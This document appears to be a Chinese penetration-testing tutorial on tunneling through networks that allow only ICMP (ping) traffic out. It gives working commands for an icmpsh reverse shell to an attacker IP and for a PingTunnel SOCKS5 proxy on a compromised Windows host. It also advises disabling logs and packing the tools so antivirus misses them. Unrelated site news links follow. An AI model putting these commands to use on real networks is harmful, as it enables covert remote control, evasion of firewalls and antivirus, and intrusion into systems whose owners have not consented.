ICMP 协议出网场景下的隧道利用技术
在内网渗透中当目标主机仅允许 ICMP 协议出网例如防火墙只放行 Ping 请求时传统的 TCP/UDP 反弹 Shell 或数据传输方式将失效。此时我们可以利用ICMP 隧道技术将其他协议的数据封装在 ICMP 报文内部实现隐蔽通信。本文将介绍 ICMP 隧道的基本原理并详细讲解两款常用工具 ——icmpsh和PingTunnel的使用方法。1. ICMP 隧道概述1.1 ICMP 协议特点无端口ICMP 位于网络层不依赖 TCP/UDP 端口而是通过类型和代码字段区分消息。广泛支持几乎所有网络设备都支持 ICMP尤其是用于网络诊断的ping命令。防火墙友好许多防火墙允许 ICMP 流量通过以保持网络的可诊断性。1.2 隧道工作原理封装数据攻击者将待传输的数据如 Shell 交互、TCP 流量放入 ICMP Echo Requestping 请求的数据负载字段。发送请求将封装后的 ICMP 包发送至目标主机。解封处理目标主机收到后提取数据并执行相应操作如启动 Shell。回传响应目标主机通过 ICMP Echo Replyping 回复将结果数据封装并返回。由于 ICMP 流量通常被允许且不易被深度检查这种隧道具备良好的隐蔽性。2. 工具一icmpsh —— 轻量级 ICMP 反弹 Shellicmpsh是一款专门用于通过 ICMP 协议反弹 Shell 的工具支持 Windows 和 Linux 目标。它需要攻击机服务端和目标机客户端配合使用。2.1 环境准备攻击机Linux需 Python2 及impacket库目标机Windows运行 icmpsh.exe2.2 攻击机操作关闭系统对 ICMP Echo 的自动回复默认情况下Linux 内核会自动响应 Ping 请求这会影响 icmpsh 的正常工作。需要临时禁用sysctl -w net.ipv4.icmp_echo_ignore_all1恢复命令sysctl -w net.ipv4.icmp_echo_ignore_all0启动服务端监听icmpsh 服务端脚本为icmpsh_m.pyPython2需指定两个 IP第一个参数攻击机本机 IP用于接收连接第二个参数目标机的公网出口 IP用于伪装源地址可通过在线查询获取python2 icmpsh_m.py 攻击机IP 目标机出口IP 示例python2 icmpsh_m.py 172.20.92.13 123.123.123.1232.3 目标机操作在目标 Windows 主机上执行 icmpsh 客户端需上传icmpsh.exeicmpsh.exe -t 攻击机IP -d 500 -b 30 -s 128参数说明-t指定攻击机 IP 地址。-d请求间隔毫秒默认 200。-b退出前允许的最大连续未应答数。-s最大数据缓冲区大小字节默认 64。执行后若攻击机服务端出现 Shell 交互界面则隧道建立成功。2.4 验证流量在攻击机或目标机上使用 Wireshark 抓包过滤icmp即可看到数据在 ICMP 负载中传输。3. 工具二PingTunnel —— 强大的 ICMP 隧道转发PingTunnel是一款功能更全面的 ICMP 隧道工具支持将 TCP、UDP 甚至 SOCKS5 流量封装为 ICMP 数据包进行转发。它分为服务端和客户端适合搭建稳定的代理通道。项目地址https://github.com/esrrhs/pingtunnel3.1 工作原理服务端部署在攻击机VPS上监听 ICMP 流量并将其解封后转发至指定目标如内网其他机器或本地的 SOCKS5 服务。客户端部署在目标机上将本地流量如浏览器代理封装成 ICMP 包发送至服务端。3.2 服务端配置攻击机同样需关闭 ICMP 自动回复与 icmpsh 相同sysctl -w net.ipv4.icmp_echo_ignore_all1启动 PingTunnel 服务端./pingtunnel -type server -noprint 1 -nolog 1-type server指定为服务端模式。-noprint 1不打印屏幕输出。-nolog 1不写日志文件。若需设置密码可添加-key 密码。3.3 客户端配置目标机在目标 Windows 主机上运行客户端需上传pingtunnel.exepingtunnel.exe -type client -l :1080 -s 攻击机IP -sock5 1 -noprint 1 -nolog 1-type client客户端模式。-l :1080本地监听 1080 端口作为 SOCKS5 代理入口。-s 攻击机IP指定服务端 IP。-sock5 1启用 SOCKS5 转发功能。-noprint/-nolog关闭输出和日志可选。3.4 参数详解参数服务端描述默认值-key设置的密码0无密码-nolog不写日志文件只打印标准输出0写日志-noprint不打印屏幕输出0打印-loglevel日志等级debug/info/warn/errorinfo-maxconn最大连接数0不限制-maxprt服务器最大处理线程数100-maxprb处理线程缓冲区大小1000-conntt连接目标地址的超时时间毫秒1000参数客户端描述默认值-l本地监听地址如:1080无-s服务器地址无-t远端转发目标直接转发模式无-timeout连接超时秒60-key密码需与服务端一致0-tcp是否转发 TCP1 为是0-tcp_bsTCP 缓冲区大小1MB-tcp_mwTCP 最大窗口20000-tcp_rstTCP 超时重发时间400ms-tcp_gz数据压缩阈值0 为不压缩0-sock5开启 SOCKS5 转发1 为是0-profile性能检测端口0不开启3.5 使用示例客户端启动后本地 SOCKS5 代理地址为127.0.0.1:1080。将浏览器或工具配置为 SOCKS5 代理所有流量将通过 ICMP 隧道从目标机转发至攻击机再由攻击机访问互联网或内网资源。4. 总结与注意事项4.1 适用场景目标主机防火墙仅允许 ICMP 出站。需要隐蔽通信避免端口扫描或深度包检测。临时绕过网络限制建立 socks5 代理或反弹 Shell。4.2 注意事项关闭 ICMP 回复在攻击机服务端上必须执行sysctl -w net.ipv4.icmp_echo_ignore_all1否则内核会响应 Ping 包干扰隧道数据。权限要求icmpsh 和 PingTunnel 在目标机上执行可能需要管理员权限尤其是 Windows 下。流量特征虽然 ICMP 隧道相对隐蔽但大量 ICMP 包或异常大的数据负载仍可能被 IDS/IPS 检测。建议控制发送频率和数据包大小。工具免杀部分杀毒软件会将 icmpsh.exe 或 pingtunnel.exe 标记为黑客工具上传前可考虑加壳或编码处理。恢复设置测试结束后记得将攻击机的icmp_echo_ignore_all恢复为 0以免影响正常 Ping 功能。

相关新闻

大数据运维(1)

大数据运维(1)

HDP Hadoop大集群高级运维工程师(含PrometheusGrafana监控专项)完整版面试题先了解不常见重要组件概念1、JournalNode(JN)作用 一句话:主备 NameNode 之间的 “共享日志中间件”,保证元数据一致。 负责存放…

2026/7/4 8:16:17 阅读更多 →
一个大学生十天做出的AI预测引擎,为什么能两次冲上GitHub全球第一?

一个大学生十天做出的AI预测引擎,为什么能两次冲上GitHub全球第一?

从舆情分析到万物预测:一个大学生用 Vibe Coding 两次登顶 GitHub 热榜的技术拆解 快速摘要: 一位 00 后大学生开发者,先后在十天内用 Vibe Coding 方式完成了两个开源项目——多智能体舆情分析系统 BettaFish 和群体智能预测引擎 MiroFish&a…

2026/5/17 12:57:58 阅读更多 →
AIAGVDA SPC黄皮书重磅发布,核心变化点解读

AIAGVDA SPC黄皮书重磅发布,核心变化点解读

2026年2月,全球汽车行业迎来了一项里程碑式的标准更新——AIAG(美国汽车工业行动小组)与VDA(德国汽车工业协会)联合发布了《统计过程控制》(SPC)黄皮书草案版。这不仅是美系与德系质量管理标准的…

2026/7/2 20:05:23 阅读更多 →

最新新闻

【无人机动态避障】基于金豺优化算法GJO融合动态窗口法DWA的无人机三维动态避障方法研究MATLAB代码

【无人机动态避障】基于金豺优化算法GJO融合动态窗口法DWA的无人机三维动态避障方法研究MATLAB代码

✅作者简介:热爱科研的Matlab仿真开发者,擅长毕业设计辅导、数学建模、数据处理、算法改进、程序设计科研仿真。 🍎完整代码获取 定制创新 论文复现私信 🍊个人信条:做科研,博学之、审问之、慎思之、明辨…

2026/7/5 1:30:17 阅读更多 →
Anthropic Fable 5 Cyber Jailbreak Severity:AI越狱统一评级体系深度解析

Anthropic Fable 5 Cyber Jailbreak Severity:AI越狱统一评级体系深度解析

引言:AI安全的"CVSS时刻" 2026年7月3日,Anthropic正式发布了**Cyber Jailbreak Severity(CJS)**评级体系——这是全球首个针对AI模型"越狱"行为严重程度的标准化评估框架。同一天,Fable 5在经历18天出口管制后重新上线,搭载了一套全新的多层级安全防…

2026/7/5 1:30:17 阅读更多 →
AI 压测数据回放:让模型读报告之前先校准口径

AI 压测数据回放:让模型读报告之前先校准口径

AI 压测数据回放:让模型读报告之前先校准口径 一、压测报告不能直接丢给模型 AI 可以帮助分析压测结果,但前提是输入数据口径清楚。很多压测报告里混着预热阶段、限流阶段、错误重试、下游故障和业务噪声。如果直接让模型总结,很容易得到一段…

2026/7/5 1:22:14 阅读更多 →
AI工具链选型:GitHub Copilot与Cursor、Codeium企业开发场景实测对比

AI工具链选型:GitHub Copilot与Cursor、Codeium企业开发场景实测对比

AI工具链选型:GitHub Copilot与Cursor、Codeium企业开发场景实测对比 一、评测体系设计与方法论 AI编码助手已成为开发效率的关键杠杆。本次评测聚焦三项主流工具的实际表现。从四个维度建立可复现的量化评测框架。 %%{init: {theme: base}}%% radartitle AI编码助手…

2026/7/5 1:20:14 阅读更多 →
PyTorch 数据加载瓶颈:GPU 空等时先看 DataLoader

PyTorch 数据加载瓶颈:GPU 空等时先看 DataLoader

PyTorch 数据加载瓶颈:GPU 空等时先看 DataLoader 一、训练慢不一定是模型慢 PyTorch 训练时,很多人看到速度慢就先改模型、调 batch size、换显卡。但如果 GPU 利用率忽高忽低,可能瓶颈根本不在模型,而在数据加载。图片解码、文本…

2026/7/5 1:20:14 阅读更多 →
群晖DSM 7.2.2视频管理终极解决方案:免费恢复Video Station完整功能

群晖DSM 7.2.2视频管理终极解决方案:免费恢复Video Station完整功能

群晖DSM 7.2.2视频管理终极解决方案:免费恢复Video Station完整功能 【免费下载链接】Video_Station_for_DSM_722 Script to install Video Station in DSM 7.2.2 and DSM 7.3 项目地址: https://gitcode.com/gh_mirrors/vi/Video_Station_for_DSM_722 你是否…

2026/7/5 1:20:14 阅读更多 →

日新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/5 0:03:34 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/5 0:03:34 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/5 0:07:38 阅读更多 →

周新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/5 0:03:34 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/5 0:03:34 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/5 0:07:38 阅读更多 →

月新闻